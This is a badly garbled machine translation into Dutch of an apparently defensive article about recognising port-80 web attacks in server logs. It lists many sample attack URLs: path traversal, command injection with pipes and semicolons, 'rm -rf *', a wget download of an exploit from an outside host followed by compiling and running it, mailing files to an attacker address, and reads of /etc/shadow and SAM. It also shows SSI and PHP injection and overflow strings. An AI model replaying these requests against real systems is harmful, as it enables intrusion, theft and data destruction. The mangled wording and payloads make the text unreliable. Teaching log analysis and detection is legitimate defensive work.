I. Samenvatting
II. Een gedetailleerde beschrijving van
III. Nadere
IV. Overloopeffecten Analyse
V. Transcoderen
VI. Conclusie
[Abstract]
website 80 als de standaard service-poort, op de diverse beveiligings-problemen die het houden van de introductie, een aantal van these mazen in het systeem of waardoor een aanvaller toegang tot de privileges van de site administrator's gain within de following zijn een aantal 80 port Zenomorph trace van de aanval methoden onderzoek, en u vertellen hoe te vinden voor problemen uit het logboek.
[Detail]
Hier in een deel via een aantal Liezi display op de website van servers en applicaties op hun algemene aanval, en de sporen, die alleen Liezi grote aanslag vormen, is er geen lijst van alle vorm van aanval, deze sectie zal gedetailleerde beschrijving van de rol van elke aanval, en zijn hoe deze kwetsbaarheden te misbruiken aanval.
(1) "." ".." En "..." verzoek
Sporen van deze aanvallen zijn zeer vaak voor web applicaties en web-servers, die werden gebruikt voor een aanvaller of een worm virus programma veranderingen web server in het Lu Jing, krijgen toegang tot niet-Gong Kai Yu Qu. De meeste CGI-programma's met deze tekortkomingen, ".." verzoek.
Voorbeeld:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Dit toont de aanvaller Liezi verzoek mosd dit bestand, als de aanvaller de mogelijkheid doorbraak webserver root directory, dan krijgt u meer informatie en verdere privileges te verkrijgen.
(2) "% 20"-verzoek
% 20 is de hexadecimale waarde dat de 16 plaatsen, maar dit betekent niet dat je iets kan gebruiken, maar wanneer je het logboek bekijken zal vinden, sommige web-server applicatie die draait op dit personage daadwerkelijk kan worden uitgevoerd Daarom moet u zorgvuldig de log. Aan de andere kant kan het verzoek soms helpen om een aantal opdrachten uit te voeren.
Voorbeeld:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Dit toont Liezi aanvaller een unix commando uit te voeren, waarin de hele catalogus van de gevraagde documenten, waardoor de aanvaller van belangrijke bestanden op uw systeem toegang, om hem te helpen verder te bieden de voorwaarden voor het verkrijgen van privileges.
(3) "% 00"-verzoek
00% zei de 16-byte hexadecimale leeg, hij was in staat om de webapplicatie dwaas, en verzoeken van verschillende soorten bestanden.
Voorbeelden:
http://host/cgi-bin/lame.cgi?page=index.html
Dit kan een geldige aanvraag in de machine zijn, als een aanvaller op de hoogte van dit verzoek was succesvol, dan zal hij verder kijken voor de cgi procedures.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Misschien is de CGI-programma kan dit niet accepteren omdat het verzoek is het verzoek om de bestandsnaam suffix, zoals: html.shtml of andere vormen van bestanden te controleren. De meeste programma's zal u vertellen het gevraagde bestand is ongeldig deze tijd, het zal u vertellen de aanvaller verzoeken het dossier moet het karakter van een bestandstype achtervoegsel worden, dus kan een aanvaller het systeem pad te krijgen, bestandsnaam, resulterend in uw systeem meer gevoelige informatie
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Aandacht voor dit verzoek, zal het CGI-programma cheat dat dit document om te bepalen van de aanvaardbare bestandstypen, some applications van inspecties effective as domme verzoek bestand, die veel gebruikt wordt methoden of de aanvaller.
(4) "|"-verzoek
Dit is een pijp karakter, in de unix-systeem, een verzoek om hulp bij de uitvoering van de diverse systeem opdrachten bij dezelfde tijd.
Voorbeeld:
# Cat access_log | grep-i ".."
(Dit commando zal de log weergegeven in de ".." verzoek, gewoonlijk gebruikt bij de aanslagen en wormen gevonden)
Vaak vind dat veel webapplicaties dit teken te gebruiken, dit ook leidt tot vals alarm in de IDS logs.
In de zorgvuldige behandeling van uw aanvraag, zodat het voordeel van de vermindering van valse alarmen in intrusion detection systemen.
Hier zijn een aantal Lieh-Tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Dit verzoek commando, de volgende zijn enkele wijzigingen in Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20% al-20/etc |
Dit verzoek is opgenomen in de Unix System / etc directory van alle bestanden
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep-i% 20% 20 "lame"
De kat commando's verzoek en de uitvoering van commando grep zal ook, check out de "lame"
(5) ";"-verzoek
In unix systemen, dit karakter maakt het mogelijk meerdere command line uitvoeren
Voorbeeld:
Id #; uname-a
(Uitvoering van het id commando, gevolgd door de uitvoering van de opdracht uname)
Sommige web-programma met dit karakter, kan resulteren in uw IDS logs een waarschuwing van mislukking, dient u zorgvuldig te controleren uw web-programma, zodat u het risico van mislukking van IDS signaleringen.
(6) " " en " " Aanvraag
Mocht je logs te controleren record de twee karakters, een aantal redenen, de eerste is het karakter dat de toegevoegde gegevens in het document
Voorbeeld 1:
# Echo "uw hax0red h0 h0" / etc / motd (motd verzoek schriftelijke informatie in dit document)
Een aanvaller kan gemakkelijk gebruik maken van het verzoek zoals hierboven knoeien met uw webpagina. Zoals de beroemde RDS gebruik maken van de aanvaller wordt vaak gebruikt om de webpagina te wijzigen.
Voorbeeld 2:
http://host/something.php=Hi 20mom%%% 20Im 20Bold!
Html, zult u merken dat de taal van tekens hier, hij ook " "," " tekens, zoals aanslagen besteed niet kan leiden tot de aanvaller toegang tot het systeem, het verwarde mensen denken dat dit een legitieme website informatie (die leidt tot mensen bezoeken deze link om de aanvaller bezoek aan het adres, kan dit verzoek worden gecodeerd in 16 hexadecimale karakters in de vorm, zodat sporen van de aanslag niet zo evident is)
(7) "!" Aanvraag
Gemeenschappelijke taal aan dit personage verzoek SS (Server Side Include) Ik aanval, wanneer de aanvaller een aanvaller verwarren de gebruiker op de link klikt, en met het hetzelfde als hierboven.
Voorbeeld:
http://host1/something.php =
De Lieh-Tzu is de aanvaller kan doen om een bestand op de site van host2 host1 verschijnt boven (uiteraard noodzakelijk de bezoekers van de aanvaller verbinding instellingen te bezoeken. Dit verzoek kan worden omgezet in 16 hex-codering masker, niet gemakkelijk gevonden)
Tegelijkertijd kan deze aanpak ook het commando autoriteit website
Voorbeeld:
http://host/something.php =
De Lieh-run op het externe systeem "id" commando, zal de website gebruikers-ID weer te geven, is meestal "niemand" of "www"
Dit formulier staat ook de verborgen bestanden opgenomen.
Voorbeeld:
http://host/something.php =
De verborgen bestanden. Htpasswd zal niet worden weergegeven, zal Apache weigeren om dergelijke regels vast te stellen. Ht van het aanvraagformulier en SSI logo zal dergelijke beperkingen te omzeilen, en leiden tot veiligheidsproblemen
(8) "," Aanvraag
Dergelijke aanvallen gebruikt om te proberen op afstand plaatst u een PHP webapplicatie procedures, kan de uitvoering mogelijk maken om, afhankelijk van de server instellingen, en andere factoren op het werk (zoals PHP is ingesteld op de veilige modus)
Voorbeeld: http://host/something.php = passthru ("id ");?
In een aantal eenvoudige PHP applicatie kan worden naar de website op het externe systeem de gebruiker rechten op de lokale opdracht uit te voeren
(9) "" "-verzoek
Dit karakter later gebruikt om commando's in perl, de personages in de webapplicatie wordt niet vaak gebruikt, dus als je het ziet in je logboek, moeten heel voorzichtig zijn
Voorbeeld:
http://host/something.cgi = `id`
Schrijf een perl cgi programma in kwestie zou leiden tot uitvoering van het id commando
[Verder]
Het volgende hoofdstuk zal de uitvoering van meer aanvallen te bespreken kunnen commando, samen met de gevraagde documenten, en als je een remote commando's fout, moet worden hoe de ontdekking te controleren. Dit deel is gewoon om u een goed idee, en vertel uw systeem wat er gebeurt, aanvallers proberen om uw systeem te sporen aanval, maar niet een lijst van alle van de aanvaller om de opdrachten en verzoeken te gebruiken.
"/ Bin / ls"
Deze opdracht vraagt de hele pad, in veel van de web applicatie programma van dit beveiligingslek, als je inlogt op vele plaatsen zoals een verzoek, is het mogelijk voor grote afstand uitvoeren commando vulnerability, maar niet noodzakelijkerwijs een probleem kan ook een vals alarm. Opnieuw herinnerde, geschreven webapplicatie (cgi, asp, php etc ...) is de basis van het veiligheidsonderzoek
Voorbeeld:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Dit is een Windows van het reservoir, als een aanvaller toegang tot en het uitvoeren van dit script in de server-instellingen onder de voorwaarden toegestaan in de Windows-machine kan alles, veel wormen te doen is via poort 80, de communicatie naar de andere machine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Dit is een twee binaire bestanden, haar problemen en / bin / ls, graag, als je inlogt op vele plaatsen een dergelijk verzoek, is het mogelijk voor de grote afstand uitvoeren commando kwetsbaar zijn, maar niet altijd een probleem kan ook een vals alarm.
Het zal laten zien welk deel behoort tot welke gebruiker en groep
Voorbeeld:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Deze opdracht kan bestanden te verwijderen zonder het juiste gebruik is zeer gevaarlijk
Voorbeelden:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20% 20-rf * |
http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wget en TFTP" commando
Deze opdrachten zijn vaak de aanvaller kan verdere privileges te krijgen om bestanden te downloaden, wget is een Unix-commando onder, kan worden gebruikt om backdoors downloaden, TFTP is onder het commando Unix en NT, wordt gebruikt om het bestand te downloaden. Sommige IIS wormen verspreiden zich door tftp om het virus te kopiëren naar andere hosts
Voorbeelden:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// gastheer / cgi-bin / bad.cgi? doh =% 20http wget: / / www.hwa-security.net/Phantasmp.c;
"Cat" commando
Dit commando wordt gebruikt om de inhoud van het bestand, gebruikt om de belangrijke informatie te lezen, zoals configuratie bestanden, wachtwoord bestanden, krediet-dossiers en documenten kunt u denken aan het oog
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"Echo" commando
Dit commando gebruikt om gegevens te schrijven naar het bestand, zoals "index.html"
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-kiwi's #% 20was% 20here"% 20 200day.txt% | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-kiwi's #% 20was% 20here"% 20 200day.txt%;
"Ps" commando
Geeft de momenteel lopende proces, vertelt de aanvaller dat een remote host de software die draait om een idee te krijgen van de veiligheid, om verdere machtigingen te verkrijgen
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH ps =% 20-aux;
"Kill en killall" commando
Unix-systemen om dit proces te doden, kan een aanvaller dit commando gebruiken om het systeem diensten en processen te stoppen kan ook wissen de sporen van de aanvaller, een aantal misbruiken zal veel van kind processen te produceren
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" commando
Dit commando vertelt de aanvaller de remote machine naam, voor enige tijd, via deze website om te weten welke isp, dit kan de aanvaller had bezocht. Uname-a normaal verzoek, deze zullen worden opgenomen in het logbestand
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH uname =% 20-a;
"Cc, gcc, Perl, Python, etc ..." compilatie / interpretatie van de opdracht
Aanvaller via wget of TFTP download te benutten en gebruik maken van de cc, gcc compiler voor een compilatie in een uitvoerbaar programma, en verder toegangsrechten
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20% p-2031337;
Als u de logs gevonden in "perl" python "Deze instructies kunnen een aanvaller op afstand perl, python script downloaden, en probeerde de privileges krijgen van de lokale
"Mail" commando
Aanvallers maken vaak gebruik van dit commando systeem, enkele belangrijke documenten op de eigen mailbox van de aanvaller, maar ook bereid zijn om e-mail bomaanslagen worden uitgevoerd
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20%
2.168.22.1;
"Chown, chmod, chgrp chsh, etc ..." en andere commando's
Unix systemen om hen in staat stellen om het bestand machtigingen te wijzigen
chown = maakt het mogelijk om eigenaar van het bestand chmod = laat om bestandspermissies chgrp = kan de eigenaar de groep machtigingen voor bestanden wijzigen chsh = toegestaan om de gebruiker shell te wijzigen
Voorbeelden: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH chmod =% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" bestand
Dit is het systeem het wachtwoord bestand, meestal schaduw uit, en niet toegestaan om de gecodeerde wachtwoorden te zien, maar de aanvaller, dit kan weten dat deze geldig zijn gebruiker en het systeem van absolute padnamen, enz. 站点 informatie, dankzij het algemeen door de schaduw uit, zodat de aanvaller zal normaal gesproken zie / etc / shadow bestand
"/ Etc / master.passwd"
Dit bestand is de BSD-systeem wachtwoord bestand, bevat de gecodeerde wachtwoord, het bestand op de root account is slechts alleen-lezen, en sommige ongeschoolde aanvallers geopend zijn poging om binnen te lezen van de inhoud., Als de website is root privileges te lopen, dan is de aanvaller is, kunnen we lezen in de inhoud, een groot aantal problemen op het systeem beheerder zal een na de ander komt
"/ Etc / shadow"
Bevat een wachtwoord versleuteld systeem, lees dan hetzelfde op de root-account, en / et / master.passwd bijna
"/ Etc / motd"
Als gebruikers zich aanmelden in de Unix-systeem, verschijnt de informatie, file in de "Message of the Day", het geeft u belangrijke informatie systeem en de beheerder van de gebruikers van een verzameling, gebruikers die willen degenen die niet zien, Ook bevat de versie-informatie-systeem, meestal de aanvaller dit bestand te bekijken, om te begrijpen wat het systeem draait op de aanvaller, de volgende stap is het zoeken naar dit soort systemen, exploiteren, en de verdere toegang tot het systeem voorrecht
"/ Etc / hosts"
Het document biedt IP-adres en informatie, kan een aanvaller meer informatie over het netwerk van de systeem-instellingen
"/ Usr / local / apache / conf / httpd.conf"
Dit is een Apache web server configuratie bestand, een aanvaller kan begrijpen, zoals CGI, SSI en andere informatie is toegankelijk
"/ Etc / inetd.conf"
Dit is het configuratiebestand inetd dienst, kan een aanvaller op afstand de machine te leren kennen, begin deze diensten, of de wrapper te gebruiken om toegang controle, als we vinden wrapper draaien, kan een aanvaller de volgende stap zal "check / etc / hosts.allow" 和"/ etc / hosts.deny", file, en die kan veranderen sommige instellingen, toegangsrechten
". Htpasswd. Htaccess, en. Htgroup"
Deze bestanden worden doorgaans gebruikt in web-site voor authenticatie van gebruikers, kan een aanvaller zou deze bestanden te bekijken, en het verkrijgen van een gebruikersnaam en wachtwoord, het wachtwoord bestand. Htpasswd gecodeerd is, breken door enkele simpele decodering proces, waardoor een aanvaller toegang tot de site beschermde gebieden (meestal de gebruiker met dezelfde gebruikersnaam en wachtwoord, kan de aanvaller zelfs een bezoekje aan andere account)
"Access_log en error_log"
Dit zijn de apache server log bestanden, aanvallers vaak deze bestanden te openen, kijk naar die verzoeken worden geregistreerd, deze en andere verzoeken voor verschillende plaatsen
Typisch, de aanvaller zal deze log bestanden, wijzigen, zoals zijn eigen adres informatie, ook de aanvaller via de haven 80 door middel van uw systeem en uw back-up systeem werkt niet, er is geen ander programma op te nemen record status van het systeem, waardoor intrusion detection wordt zeer moeilijk om te werken
"[Drive-letter]: winntrepairsam._ of [drive-letter]: winntrepairsam"
Windows NT-systeem wachtwoord bestand, als de externe opdracht kan niet worden uitgevoerd, zal aanvallers vragen meestal een van deze documenten, dan "l0pht crack" van het type password cracking tools te kraken, als de aanvaller probeert om door de beheerder het wachtwoord van het bestand, aanvallen als succesvoller dan de andere machine zal de aanvaller de controle krijgt
[Overloop analyse]
In dit artikel zal ik zal niet zeggen dat te veel over de overflow van the topic, zal ik erop aan instructions those verschijnselen en sporen van de opmerkelijke en van het bijzonder concern, een buffer wordt vaak misbruikt om code conversion en moeilijk te other ways aanval te bereiken find
Hier is een simpele Lie Zi
Voorbeeld: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Dit Liezi toont de aanvaller op een aanvraag om een partij van een personage te sturen, om het programma te testen een buffer overflow kan buffer overflow krijgt een remote commando-uitvoering host machtigingen, indien de eigenaar heeft de setuid en procedures voor de wortel, via de overloop, kan de toegang tot het gehele systeem te krijgen, als niet leuk setuid programma, dan is de overflow is alleen door het uitvoeren van de web-site rechten van de gebruiker
Hier kan niet alle omstandigheden vertellen, maar je moet regelmatig uw log-bestand, als die dag plotseling heel veel aanvragen, meestal maar niet meer dan het verzoek, betekent dit dat je bent onderworpen aan overflow aanvallen, natuurlijk, kan ook worden Een nieuw netwerk wormaanval
[Transcoderen]
Alle aanslagen bovengenoemde aanvraag, de aanvaller weet meestal IDS systemen vaak mechanische check verzoek, meestal de aanvaller zal gebruik maken van data conversie tool om de gevraagde inhoud formaat 16 band te zetten, wat resulteert in IDS zal deze verzoeken te negeren, We zijn vertrouwd met de CGI-vulnerability scanning tools Whisker is een goede Liezi. Als u het logboek van de tijd vond een groot aantal van de 16-band en niet een aantal gemeenschappelijke karakters, dan is de aanvaller kan proberen om enkele van de manieren om uw systeem aanvallen te gebruiken
Een snelle manier is uw logbestand Zhong van deze 16 hex verzoeken, te kopiëren naar uw browser via webbrowsers in de juiste Keyizhuanhua het verzoek, en weergegeven verzocht de inhoud, als u niet moed om dit risico, een eenvoudig man ASCII, dan kunt u te voorzien van de juiste code.
[Conclusie]
Dit artikel kan niet alle 80 poorten van de aanval, maar de meeste zijn meer dan de algemene aanval aangehaald, en u vertellen hoe u uw log bestanden te controleren, en hoe toe te voegen, zoals het aantal van IDS regels, schrijf haar doel is om web op met de systeembeheerder zorgen moeten maken over wat een goed idee op hetzelfde moment, ik hoop dat dit artikel helpt om het programma webontwikkelaars web naar betere programma's te schrijven
VAN LET OP: Als u opmerkingen en suggesties, stuur dan een e-mail admin@cgisecurity.com.